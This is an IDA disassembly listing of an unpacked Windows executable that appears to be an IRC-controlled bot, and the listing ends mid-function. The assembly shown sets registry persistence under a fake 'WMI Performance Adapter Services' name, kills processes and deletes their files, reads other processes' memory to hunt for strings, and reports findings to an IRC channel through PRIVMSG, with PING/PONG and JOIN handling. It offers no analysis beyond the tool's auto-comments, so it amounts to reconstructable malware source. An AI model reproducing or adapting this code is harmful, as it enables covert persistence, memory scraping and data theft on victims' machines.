;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : DD186CD27273E85B7A730E39A205469C
; File Name : u:\work\dd186cd27273e85b7a730e39a205469c_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000C6000 ( 811008.)
; Section size in file : 000C6000 ( 811008.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
public start
start proc near ; CODE XREF: sub_404BAB+49E�p
; sub_408B66+16�p
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
push edi
mov edi, [esp+14h+arg_0]
xor ebp, ebp
xor esi, esi
mov ebx, offset aWmiPerformance ; "WMI Performance Adapter Services"
loc_401012: ; CODE XREF: start+6B�j
push ebp
lea eax, [esp+18h+var_4]
push eax
push ebp
push 0F003Fh
push ebp
push ebp
push ebp
push off_41E05C[esi]
push dword_41E058[esi]
call dword_419008 ; RegCreateKeyExA
cmp edi, ebp
jz short loc_401050
push edi
call sub_40D630
pop ecx
push eax
push edi
push 1
push ebp
push ebx
push dword ptr [esp+28h+var_4]
call dword_41900C ; RegSetValueExA
jmp short loc_40105B
; ---------------------------------------------------------------------------
loc_401050: ; CODE XREF: start+35�j
push ebx
push dword ptr [esp+18h+var_4]
call dword_419010 ; RegDeleteValueA
loc_40105B: ; CODE XREF: start+4E�j
push dword ptr [esp+14h+var_4]
call dword_419014 ; RegCloseKey
add esi, 8
cmp esi, 40h
jb short loc_401012
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401073 proc near ; CODE XREF: sub_401179+F5�p
var_228 = dword ptr -228h
var_224 = byte ptr -224h
var_208 = byte ptr -208h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_C = dword ptr 14h
arg_28 = byte ptr 30h
push ebp
mov ebp, esp
sub esp, 228h
and [ebp+var_228], 0
push esi
push edi
push [ebp+arg_C]
xor eax, eax
mov ecx, 88h
lea edi, [ebp+var_224]
push 8
rep stosd
call sub_40D61C ; CreateToolhelp32Snapshot
mov edi, eax
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call sub_40D616 ; Module32First
test eax, eax
jz loc_401167
mov esi, offset dword_421B00
loc_4010C4: ; CODE XREF: sub_401073+EE�j
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+arg_28]
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401152
push 80h
lea eax, [ebp+var_108]
push eax
call dword_419078 ; SetFileAttributesA
push [ebp+arg_C]
push 0
push 1F0FFFh
call dword_419074 ; OpenProcess
push 0
push eax
mov [ebp+var_4], eax
call dword_419070 ; TerminateProcess
push 1F4h
call dword_419060 ; Sleep
lea eax, [ebp+var_108]
push eax
call dword_41906C ; DeleteFileA
test eax, eax
jz short loc_40113E
lea eax, [ebp+var_108]
push eax
push offset dword_41E1A8
push offset aPrivmsgST3rmin ; "PRIVMSG %s :T3rmina3d and del3t3d %s\n"
push esi
call sub_40D6BB
add esp, 10h
loc_40113E: ; CODE XREF: sub_401073+AF�j
push 0
push esi
call sub_40D630
pop ecx
push eax
push esi
push [ebp+arg_0]
call dword_419258 ; send
loc_401152: ; CODE XREF: sub_401073+65�j
lea eax, [ebp+var_228]
push eax
push edi
call sub_40D610 ; Module32Next
test eax, eax
jnz loc_4010C4
loc_401167: ; CODE XREF: sub_401073+46�j
push [ebp+var_4]
mov esi, dword_419064
call esi ; CloseHandle
push edi
call esi ; CloseHandle
pop edi
pop esi
leave
retn
sub_401073 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401179 proc near ; CODE XREF: sub_4012BA+BA�p
; sub_4012BA+DC�p
var_5508 = byte ptr -5508h
var_5507 = byte ptr -5507h
var_508 = byte ptr -508h
var_507 = byte ptr -507h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 5508h
call sub_40D9A0
and [ebp+var_5508], 0
and [ebp+var_508], 0
push ebx
push esi
push edi
push [ebp+arg_14]
xor eax, eax
mov ecx, 13FFh
lea edi, [ebp+var_5507]
rep stosd
stosw
stosb
xor eax, eax
mov ecx, 13Fh
lea edi, [ebp+var_507]
rep stosd
stosw
xor esi, esi
push esi
push 1F0FFFh
stosb
call dword_419074 ; OpenProcess
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
mov [ebp+arg_4], eax
ja loc_4012AC
mov ebx, offset dword_421B00
loc_4011E3: ; CODE XREF: sub_401179+12D�j
push esi
push 500h
lea eax, [ebp+var_508]
push eax
push [ebp+arg_4]
push [ebp+var_4]
call dword_419084 ; ReadProcessMemory
cmp eax, esi
jz loc_4012AC
lea eax, [ebp+var_508]
push eax
lea eax, [ebp+var_5508]
push eax
call sub_40D8B0
cmp off_41E09C, esi
pop ecx
pop ecx
jz short loc_401288
mov eax, offset off_41E09C
mov [ebp+var_8], eax
loc_401229: ; CODE XREF: sub_401179+10D�j
push dword ptr [eax]
lea eax, [ebp+var_5508]
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_40127B
push esi
push ebx
call sub_40D630
pop ecx
push eax
push ebx
push [ebp+arg_0]
call dword_419258 ; send
push 7D0h
call dword_419060 ; Sleep
sub esp, 128h
push 4Ah
pop ecx
mov edi, esp
push [ebp+arg_0]
lea esi, [ebp+arg_C]
rep movsd
call sub_401073
add esp, 12Ch
xor esi, esi
loc_40127B: ; CODE XREF: sub_401179+C2�j
mov eax, [ebp+var_8]
add eax, 8
cmp [eax], esi
mov [ebp+var_8], eax
jnz short loc_401229
loc_401288: ; CODE XREF: sub_401179+A6�j
push 5000h
lea eax, [ebp+var_5508]
push esi
push eax
call sub_40D7B0
add esp, 0Ch
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jbe loc_4011E3
loc_4012AC: ; CODE XREF: sub_401179+5F�j
; sub_401179+85�j
push [ebp+var_4]
call dword_419064 ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_401179 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012BA proc near ; CODE XREF: sub_40198E+D6F�p
var_1C0 = byte ptr -1C0h
var_140 = dword ptr -140h
var_11C = byte ptr -11Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C0h
push ebx
push esi
push edi
push 80h
lea eax, [ebp+var_1C0]
push eax
push 0
call dword_419094 ; GetModuleHandleA
push eax
call dword_419090 ; GetModuleFileNameA
push 0
lea eax, [ebp+var_1C0]
push 2
mov [ebp+var_18], offset aExplorer_exe ; "explorer.exe"
mov [ebp+var_14], offset aHidserv_exe ; "hidserv.exe"
mov [ebp+var_10], offset aWinlogon_exe ; "WINLOGON.EXE"
mov [ebp+var_C], offset aServices_exe ; "SERVICES.EXE"
mov [ebp+var_8], eax
call sub_40D61C ; CreateToolhelp32Snapshot
lea ecx, [ebp+var_140]
push ecx
push eax
mov [ebp+var_4], eax
mov [ebp+var_140], 128h
mov bl, 1
call sub_40D628 ; Process32First
jmp loc_4013B4
; ---------------------------------------------------------------------------
loc_401330: ; CODE XREF: sub_4012BA+FC�j
xor esi, esi
loc_401332: ; CODE XREF: sub_4012BA+94�j
lea eax, [ebp+var_11C]
push eax
push [ebp+esi*4+var_18]
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_40134A
xor bl, bl
loc_40134A: ; CODE XREF: sub_4012BA+8C�j
inc esi
cmp esi, 5
jb short loc_401332
test bl, bl
jz short loc_4013A3
sub esp, 128h
push 4Ah
pop ecx
mov edi, esp
push 4FFFFFh
push 400000h
push [ebp+arg_0]
lea esi, [ebp+var_140]
rep movsd
call sub_401179
add esp, 0Ch
push 4Ah
pop ecx
mov edi, esp
push 1FFFFFh
push 100000h
push [ebp+arg_0]
lea esi, [ebp+var_140]
rep movsd
call sub_401179
add esp, 134h
jmp short loc_4013A5
; ---------------------------------------------------------------------------
loc_4013A3: ; CODE XREF: sub_4012BA+98�j
mov bl, 1
loc_4013A5: ; CODE XREF: sub_4012BA+E7�j
lea eax, [ebp+var_140]
push eax
push [ebp+var_4]
call sub_40D622 ; Process32Next
loc_4013B4: ; CODE XREF: sub_4012BA+71�j
test eax, eax
jnz loc_401330
push [ebp+var_4]
call dword_419064 ; CloseHandle
dec dword_420F84
js short loc_4013D5
inc off_420F80
jmp short loc_4013E0
; ---------------------------------------------------------------------------
loc_4013D5: ; CODE XREF: sub_4012BA+111�j
push offset off_420F80
call sub_40D9DD
pop ecx
loc_4013E0: ; CODE XREF: sub_4012BA+119�j
pop edi
pop esi
pop ebx
leave
retn
sub_4012BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013E5 proc near ; CODE XREF: sub_40151D+BA�p
; sub_40151D+DC�p
var_5508 = byte ptr -5508h
var_5507 = byte ptr -5507h
var_508 = byte ptr -508h
var_507 = byte ptr -507h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_14 = dword ptr 1Ch
arg_30 = byte ptr 38h
push ebp
mov ebp, esp
mov eax, 5508h
call sub_40D9A0
push ebx
push edi
push [ebp+arg_14]
xor eax, eax
xor ebx, ebx
mov [ebp+var_5508], bl
mov ecx, 13FFh
lea edi, [ebp+var_5507]
rep stosd
stosw
stosb
mov [ebp+var_508], bl
xor eax, eax
mov ecx, 13Fh
lea edi, [ebp+var_507]
rep stosd
stosw
push ebx
push 1F0FFFh
stosb
call dword_419074 ; OpenProcess
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
mov [ebp+arg_4], eax
ja loc_401510
push esi
mov esi, offset dword_421C00
loc_40144D: ; CODE XREF: sub_4013E5+124�j
push ebx
push 500h
lea eax, [ebp+var_508]
push eax
push [ebp+arg_4]
push [ebp+var_4]
call dword_419084 ; ReadProcessMemory
cmp eax, ebx
jz loc_40150F
lea eax, [ebp+var_508]
push eax
lea eax, [ebp+var_5508]
push eax
call sub_40D8B0
cmp off_41E0BC, ebx
pop ecx
pop ecx
jz short loc_4014EB
mov edi, offset off_41E0BC
mov [ebp+var_8], edi
loc_401493: ; CODE XREF: sub_4013E5+104�j
push dword ptr [edi]
loc_401495: ; DATA XREF: .text:off_41F6B0�o
lea eax, [ebp+var_5508]
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_4014DE
lea eax, [ebp+arg_30]
push eax
push dword ptr [edi]
push offset dword_41E1A8
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found string \"%s\" in \"%s\" \n"...
push esi
call sub_40D6BB
add esp, 14h
push ebx
push esi
call sub_40D630
pop ecx
push eax
push esi
push [ebp+arg_0]
call dword_419258 ; send
push 7D0h
call dword_419060 ; Sleep
loc_4014DE: ; CODE XREF: sub_4013E5+C0�j
mov edi, [ebp+var_8]
add edi, 8
cmp [edi], ebx
mov [ebp+var_8], edi
jnz short loc_401493
loc_4014EB: ; CODE XREF: sub_4013E5+A4�j
push 5000h
lea eax, [ebp+var_5508]
push ebx
push eax
call sub_40D7B0
add esp, 0Ch
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jbe loc_40144D
loc_40150F: ; CODE XREF: sub_4013E5+83�j
pop esi
loc_401510: ; CODE XREF: sub_4013E5+5C�j
push [ebp+var_4]
call dword_419064 ; CloseHandle
pop edi
pop ebx
leave
retn
sub_4013E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40151D proc near ; CODE XREF: sub_40198E+DAB�p
var_1C0 = byte ptr -1C0h
var_140 = dword ptr -140h
var_11C = byte ptr -11Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C0h
push ebx
push esi
push edi
push 80h
lea eax, [ebp+var_1C0]
push eax
push 0
call dword_419094 ; GetModuleHandleA
push eax
call dword_419090 ; GetModuleFileNameA
push 0
lea eax, [ebp+var_1C0]
push 2
mov [ebp+var_18], offset aExplorer_exe ; "explorer.exe"
mov [ebp+var_14], offset aHidserv_exe ; "hidserv.exe"
mov [ebp+var_10], offset aWinlogon_exe ; "WINLOGON.EXE"
mov [ebp+var_C], offset aServices_exe ; "SERVICES.EXE"
mov [ebp+var_8], eax
call sub_40D61C ; CreateToolhelp32Snapshot
lea ecx, [ebp+var_140]
push ecx
push eax
mov [ebp+var_4], eax
mov [ebp+var_140], 128h
mov bl, 1
call sub_40D628 ; Process32First
jmp loc_401617
; ---------------------------------------------------------------------------
loc_401593: ; CODE XREF: sub_40151D+FC�j
xor esi, esi
loc_401595: ; CODE XREF: sub_40151D+94�j
lea eax, [ebp+var_11C]
push eax
push [ebp+esi*4+var_18]
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_4015AD
xor bl, bl
loc_4015AD: ; CODE XREF: sub_40151D+8C�j
inc esi
cmp esi, 5
jb short loc_401595
test bl, bl
jz short loc_401606
sub esp, 128h
push 4Ah
pop ecx
mov edi, esp
push 4FFFFFh
push 400000h
push [ebp+arg_0]
lea esi, [ebp+var_140]
rep movsd
call sub_4013E5
add esp, 0Ch
push 4Ah
pop ecx
mov edi, esp
push 1FFFFFh
push 100000h
push [ebp+arg_0]
lea esi, [ebp+var_140]
rep movsd
call sub_4013E5
add esp, 134h
jmp short loc_401608
; ---------------------------------------------------------------------------
loc_401606: ; CODE XREF: sub_40151D+98�j
mov bl, 1
loc_401608: ; CODE XREF: sub_40151D+E7�j
lea eax, [ebp+var_140]
push eax
push [ebp+var_4]
call sub_40D622 ; Process32Next
loc_401617: ; CODE XREF: sub_40151D+71�j
test eax, eax
jnz loc_401593
push [ebp+var_4]
call dword_419064 ; CloseHandle
dec dword_420F84
js short loc_401638
inc off_420F80
jmp short loc_401643
; ---------------------------------------------------------------------------
loc_401638: ; CODE XREF: sub_40151D+111�j
push offset off_420F80
call sub_40D9DD
pop ecx
loc_401643: ; CODE XREF: sub_40151D+119�j
pop edi
pop esi
pop ebx
leave
retn
sub_40151D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401648 proc near ; CODE XREF: sub_40198E+3BF�p
; sub_40198E+5DD�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea eax, [ebp+var_10]
push eax
call dword_419098 ; GetLocalTime
mov esi, offset dword_4BD7E0
mov edi, offset dword_4B98E0
loc_401664: ; CODE XREF: sub_401648+3B�j
cmp byte ptr [esi], 0
jz short loc_40167B
push 7Fh
lea eax, [esi+80h]
push esi
push eax
call sub_40DB80
add esp, 0Ch
loc_40167B: ; CODE XREF: sub_401648+1F�j
sub esi, 80h
cmp esi, edi
jge short loc_401664
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s"
push edi
call sub_40D6BB
add esp, 24h
pop edi
pop esi
leave
retn
sub_401648 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4016B8 proc near ; CODE XREF: sub_40198E+F40�p
; sub_40198E+F69�p ...
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 400h
push 400h
lea eax, [ebp+var_400]
push 0
push eax
call sub_40D7B0
push [ebp+arg_4]
lea eax, [ebp+var_400]
push offset aS ; "%s\r\n"
push eax
call sub_40D6BB
add esp, 18h
lea eax, [ebp+var_400]
push 0
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_400]
push eax
push [ebp+arg_0]
call dword_419258 ; send
leave
retn
sub_4016B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40170D proc near ; CODE XREF: sub_40198E+1BB�p
; sub_40198E+222�p ...
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push 400h
lea eax, [ebp+var_400]
push 0
push eax
call sub_40D7B0
push [ebp+arg_8]
lea eax, [ebp+var_400]
push [ebp+arg_4]
push eax
call sub_40D6BB
add esp, 18h
lea eax, [ebp+var_400]
push 0
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_400]
push eax
push [ebp+arg_0]
call dword_419258 ; send
leave
retn
sub_40170D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401760 proc near ; CODE XREF: sub_40198E+1DC�p
; sub_40198E+3B3�p ...
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 400h
push 400h
lea eax, [ebp+var_400]
push 0
push eax
call sub_40D7B0
push [ebp+arg_C]
lea eax, [ebp+var_400]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_40D6BB
add esp, 1Ch
lea eax, [ebp+var_400]
push 0
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_400]
push eax
push [ebp+arg_0]
call dword_419258 ; send
leave
retn
sub_401760 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017B6 proc near ; CODE XREF: sub_40198E+428�p
; sub_40198E+50B�p ...
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 400h
push 400h
lea eax, [ebp+var_400]
push 0
push eax
call sub_40D7B0
add esp, 0Ch
cmp [ebp+arg_C], 0
mov eax, offset aNotice ; "NOTICE"
jnz short loc_4017E5
mov eax, offset aPrivmsg ; "PRIVMSG"
loc_4017E5: ; CODE XREF: sub_4017B6+28�j
push [ebp+arg_8]
push [ebp+arg_4]
push eax
lea eax, [ebp+var_400]
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_40D6BB
add esp, 14h
lea eax, [ebp+var_400]
push 0
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_400]
push eax
push [ebp+arg_0]
call dword_419258 ; send
leave
retn
sub_4017B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401822 proc near ; CODE XREF: sub_40198E+A1A�p
; sub_40198E+A45�p ...
var_C04 = byte ptr -0C04h
var_804 = byte ptr -804h
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0C04h
push ebx
push esi
push edi
mov esi, 400h
push esi
xor edi, edi
lea eax, [ebp+var_404]
push edi
push eax
call sub_40D7B0
push esi
lea eax, [ebp+var_804]
push edi
push eax
call sub_40D7B0
push esi
lea eax, [ebp+var_C04]
push edi
push eax
call sub_40D7B0
dec esi
push esi
push [ebp+arg_0]
lea eax, [ebp+var_404]
push eax
call sub_40DB80
mov edi, [ebp+arg_8]
push edi
call sub_40D630
add esp, 34h
cmp eax, 180h
jbe short loc_40188A
and byte ptr [edi+180h], 0
loc_40188A: ; CODE XREF: sub_401822+5F�j
mov ebx, [ebp+arg_4]
jmp loc_40194F
; ---------------------------------------------------------------------------
loc_401892: ; CODE XREF: sub_401822+13E�j
lea eax, [ebp+var_404]
push ebx
push eax
call sub_40D810
pop ecx
pop ecx
push esi
push ebx
mov edi, eax
call sub_40D630
pop ecx
add eax, edi
push eax
lea eax, [ebp+var_C04]
push eax
call sub_40DB80
and byte ptr [edi], 0
push esi
lea eax, [ebp+var_404]
push eax
lea eax, [ebp+var_804]
push eax
call sub_40DB80
add esp, 18h
inc edi
test edi, edi
jz short loc_401940
lea eax, [ebx-1]
test eax, eax
jz short loc_401940
lea eax, [ebx-1]
push eax
call sub_40D630
push edi
mov [ebp+var_4], eax
call sub_40D630
pop ecx
pop ecx
mov ecx, [ebp+var_4]
cmp eax, ecx
jbe short loc_401922
lea eax, [ebp+var_C04]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_804]
push eax
lea eax, [ebp+var_404]
push offset aSSS_0 ; "%s%s%s"
push eax
call sub_40D6BB
add esp, 14h
jmp short loc_401940
; ---------------------------------------------------------------------------
loc_401922: ; CODE XREF: sub_401822+D7�j
push [ebp+arg_8]
lea eax, [ebp+var_804]
push eax
lea eax, [ebp+var_404]
push offset aSS ; "%s%s"
push eax
call sub_40D6BB
add esp, 10h
loc_401940: ; CODE XREF: sub_401822+B5�j
; sub_401822+BC�j ...
push [ebp+arg_8]
push ebx
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_401966
loc_40194F: ; CODE XREF: sub_401822+6B�j
lea eax, [ebp+var_404]
push ebx
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz loc_401892
loc_401966: ; CODE XREF: sub_401822+12B�j
lea eax, [ebp+var_404]
push eax
call sub_40D630
inc eax
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+arg_0]
call sub_40DB80
mov eax, [ebp+arg_0]
add esp, 10h
pop edi
pop esi
pop ebx
leave
retn
sub_401822 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40198E proc near ; CODE XREF: sub_40479E+FA�p
var_1444 = byte ptr -1444h
var_1044 = byte ptr -1044h
var_C44 = byte ptr -0C44h
var_BC4 = dword ptr -0BC4h
var_BC0 = byte ptr -0BC0h
var_AB8 = dword ptr -0AB8h
var_AB4 = byte ptr -0AB4h
var_A34 = byte ptr -0A34h
var_939 = byte ptr -939h
var_938 = byte ptr -938h
var_934 = byte ptr -934h
var_834 = dword ptr -834h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_3B3 = byte ptr -3B3h
var_3B2 = byte ptr -3B2h
var_3B0 = byte ptr -3B0h
var_3AF = byte ptr -3AFh
var_3A6 = byte ptr -3A6h
var_3A4 = byte ptr -3A4h
var_3A2 = byte ptr -3A2h
var_3A1 = byte ptr -3A1h
var_3A0 = byte ptr -3A0h
var_39D = byte ptr -39Dh
var_39B = byte ptr -39Bh
var_314 = byte ptr -314h
var_304 = dword ptr -304h
var_300 = byte ptr -300h
var_280 = byte ptr -280h
var_23C = byte ptr -23Ch
var_22C = byte ptr -22Ch
var_200 = byte ptr -200h
var_1F4 = byte ptr -1F4h
var_1AC = byte ptr -1ACh
var_188 = dword ptr -188h
var_184 = dword ptr -184h
var_180 = byte ptr -180h
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_154 = byte ptr -154h
var_134 = dword ptr -134h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = byte ptr -0F0h
var_D8 = byte ptr -0D8h
var_D4 = byte ptr -0D4h
var_C8 = byte ptr -0C8h
var_C4 = dword ptr -0C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_48 = dword ptr -48h
var_38 = byte ptr -38h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
mov eax, 1444h
call sub_40D9A0
push ebx
push esi
xor ebx, ebx
mov esi, 400h
push esi
lea eax, [ebp+var_814]
push ebx
push eax
mov [ebp+var_10], ebx
mov [ebp+var_4], ebx
mov [ebp+var_18], ebx
call sub_40D7B0
push 0Fh
push [ebp+arg_10]
lea eax, [ebp+var_314]
push eax
mov [ebp+var_24], ebx
call sub_40DB80
add esp, 18h
cmp [ebp+arg_0], ebx
jnz short loc_4019DF
xor eax, eax
inc eax
jmp loc_401C36
; ---------------------------------------------------------------------------
loc_4019DF: ; CODE XREF: sub_40198E+47�j
push edi
push esi
lea eax, [ebp+var_1044]
push ebx
push eax
call sub_40D7B0
mov esi, 3FFh
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1044]
push eax
call sub_40DB80
lea eax, [ebp+var_1044]
push offset asc_419D50 ; " :"
push eax
call sub_40D810
mov [ebp+var_14], eax
push esi
lea eax, [ebp+var_1044]
push eax
lea eax, [ebp+var_1444]
push eax
call sub_40DB80
mov edi, offset asc_419D4C ; " "
lea eax, [ebp+var_1444]
push edi
push eax
call sub_40E1DE
xor esi, esi
add esp, 34h
mov [ebp+var_B8], eax
inc esi
loc_401A49: ; CODE XREF: sub_40198E+CF�j
push edi
push ebx
call sub_40E1DE
mov [ebp+esi*4+var_B8], eax
inc esi
cmp esi, 20h
pop ecx
pop ecx
jl short loc_401A49
mov esi, [ebp+var_B8]
cmp esi, ebx
jz loc_401C32
mov edi, [ebp+var_B4]
cmp edi, ebx
jz loc_401C32
push 100h
lea eax, [ebp+var_414]
push ebx
push eax
call sub_40D7B0
add esp, 0Ch
push 1Fh
pop edx
loc_401A93: ; CODE XREF: sub_40198E+13F�j
lea ecx, [ebp+edx*4+var_B8]
mov eax, [ecx]
cmp eax, ebx
jz short loc_401ACC
cmp byte ptr [eax], 2Dh
jnz short loc_401ACF
cmp [eax+2], bl
jnz short loc_401ACF
movsx esi, byte ptr [eax+1]
mov [ebp+esi+var_414], 1
mov [eax], bl
mov [ecx], ebx
mov edi, [ebp+var_B4]
mov esi, [ebp+var_B8]
mov [eax+1], bl
mov [eax+2], bl
loc_401ACC: ; CODE XREF: sub_40198E+110�j
dec edx
jns short loc_401A93
loc_401ACF: ; CODE XREF: sub_40198E+115�j
; sub_40198E+11A�j
cmp [ebp+var_3A1], bl
jz short loc_401ADE
mov [ebp+var_10], 1
loc_401ADE: ; CODE XREF: sub_40198E+147�j
cmp [ebp+var_3A6], bl
jz short loc_401AF0
mov [ebp+var_10], ebx
mov [ebp+var_4], 1
loc_401AF0: ; CODE XREF: sub_40198E+156�j
cmp byte ptr [esi], 0Ah
jz short loc_401B2A
push 7Fh
lea eax, [ebp+var_C44]
push esi
push eax
call sub_40DB80
push 17h
lea eax, [esi+1]
push eax
lea eax, [ebp+var_F0]
push eax
call sub_40DB80
lea eax, [ebp+var_F0]
push offset asc_419D48 ; "!"
push eax
call sub_40E1DE
add esp, 20h
loc_401B2A: ; CODE XREF: sub_40198E+165�j
push esi
push offset aPing ; "PING"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_401B74
inc edi
push edi
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
mov byte ptr [esi+1], 30h
call sub_40170D
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
loc_401B56: ; CODE XREF: sub_40198E+22D�j
jnz loc_401C32
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
